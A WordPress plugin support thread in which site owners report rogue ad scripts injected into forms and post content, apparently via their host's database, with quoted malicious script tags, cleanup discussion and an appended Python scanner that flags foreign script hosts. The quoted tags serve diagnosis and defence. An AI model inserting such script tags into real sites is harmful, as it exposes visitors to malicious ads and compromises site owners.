Support » Plugin: Anti-Malware Security and Brute-Force Firewall » MW:JS:GEN2?rogueads.unwanted_ads.1

  • Resolved sussexlongman

    (@sussexlongman)


    Hi, I’m having a problem with some malware that is being repeatedly added in front of a Mailchimp form. The script is creating links to external websites upon clicking on navigation links. A Sucuri scan picks up the malware but your scanner does not at the moment. This is the Sucuri report:

    Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?rogueads.unwanted_ads.1
    
    </script><!-- MailChimp for WordPress v4.0.13 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-534" method="post" data-id="534" data-name="" ><div class="mc4wp-form-fields"><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script>

    I have removed the inserted code from the Mailchimp form several times which cleans the site but the code returns within a day or two so I presume there is malicious code elsewhere on the site doing this. Any help would be very much appreciated, thanks.

Viewing 15 replies - 16 through 30 (of 30 total)
  • Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Side note: These forums work as follows.

    A person has a problem and posts about it. People who can help that person reply with advice. That’s because this topic belongs to the original poster. It’s not the plugin author’s and it’s not the topic of people who think they may have the same problem.

    If you’re not helping the original poster then per the forum welcome please post your own topic. You can do so with this link.

    https://wordpress.org/support/plugin/gotmls/#new-post

    Faced with this problem, I am starting to solve it. I’ll keep you up to date with what I get. I would advise finding the old database backup and restoring it, as there is so much infected code in the database file.

    Plugin Author Eli

    (@scheeeli)

    Hi Jan (@jdembowski),
    I’m not sure why you deleted the contributions by Aminul Islam and natepayne. I understand that they also had the same issue but it seemed relevant and helpful that they were all communicating together. That is also how they were able to confirm that they were all using the same hosting. This seems to point directly to the solution since all of them were having the same database injections on the same host and none of them had any back-doors or vulnerabilities on their sites.

    Maybe you don’t want them bad-mouthing their host on your forums so I won’t mention that host’s name here but it is clear to me that it was the hosting provider’s vulnerability on their database server that allowed direct injection of this malicious content and the host was not being very helpful or forthcoming to their clients. The only solution that seemed to work for the clients/posters was to move to another host. Isn’t it better to have that conversation posted here if it contains the source of the problem and the solution?

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Nothing is really deleted in these forums and I’ll unarchive those posts.

    This isn’t an invitation to get into a protracted conversation when I write this: let’s keep an eye on the ball and assist the original person with the problem.

    Thanks for reinstating the posts. It has been useful to know that the host is common, and I noticed there is also a Wordfence thread now on the same topic where the same host gets another mention, so that does seem more than a coincidence. Someone there suggests that on their site at least a MySQL search and replace tool was placed in wp-content/upgrade folder to inject ad code into the database. I’m following this up with the host.

    In my case, there was malicious code in all posts. I have removed this for now but am expecting it to come back. Exploit Scanner was the only scan to pick this up.

    Hi, guys,
    any news regarding this?
    Have you managed to clean your site or was moving to another host the only option?
    I was affected too but on another host.

    • This reply was modified 2 years, 4 months ago by  oga23.

    @sussexlongman – how did you clean it?

    I cleaned it myself using a MySQL query. You can find it on Stack Overflow.

    Is this a code, or how do I find it?

    Has anyone found a solution to this issue?

    I am also with TSO Host and my site has also been infected.

    VP

    (@studio500)

    For the benefit of others, I also picked up this malicious script whilst on TSO host.

    Sadly I migrated to a new host and it appears the code came with me.

    TSO Host is definitely linked to this in some way.

    VP

    (@studio500)

    I’m still in the process of trying to clean my site.

    @studio500 you have to clean your site before uploading it to the new server to get rid of this problem.

    Hello, my website https://bargaincrave.com has this malware:
    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1361613&interactive=1&pushup=1"></script>
    I tried your plugin but it showed nothing. How can I remove this, Sir? Please help me out.

    Plugin Author Eli

    (@scheeeli)

    Check the HTML content in your posts. TSO Host seems to have a really severe issue with hackers injecting JavaScript into all their clients’ databases directly.
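
    The check suggested in the reply above can be scripted. This is an added example, not code from the thread or from the plugin: it lists external script hosts in post content that are not on an allowlist. The allowlist hosts, post IDs and sample rows are constructed; the flagged hosts are the ones quoted in the Sucuri report at the top of the thread. Rows are assumed to be (ID, post_content) pairs exported from the posts table.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"example.org", "cdn.example.org"}

class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> element."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append(src)

def foreign_script_hosts(html, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return the sorted external script hosts that are not on the allowlist."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    hosts = set()
    for src in collector.sources:
        # hostname is None for relative URLs; //host/path is parsed as a host
        host = urlparse(src).hostname
        if host and host not in allowed:
            hosts.add(host)
    return sorted(hosts)

def scan_posts(rows):
    """rows: iterable of (post_id, post_content). Return {post_id: [hosts]}."""
    report = {}
    for post_id, content in rows:
        hosts = foreign_script_hosts(content)
        if hosts:
            report[post_id] = hosts
    return report

# Constructed sample rows; injected tags shortened from the report in this thread.
SAMPLE_ROWS = [
    (101, '<p>Clean</p><script src="https://cdn.example.org/app.js"></script>'),
    (102, "<p>Hi</p><script src='//go.pub2srv.com/apu.php?zoneid=683723'></script>"),
    (103, '<script async="async" src="//go.mobisla.com/notice.php?p=683724"></script>'
          "<script data-cfasync='false' src='//p79479.clksite.com/adServe/banners'></script>"),
]

if __name__ == "__main__":
    for post_id, hosts in scan_posts(SAMPLE_ROWS).items():
        print(post_id, hosts)
```

    Posts that appear in the report are the ones to review and clean; a post that only loads scripts from allowlisted hosts or relative paths is not listed.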
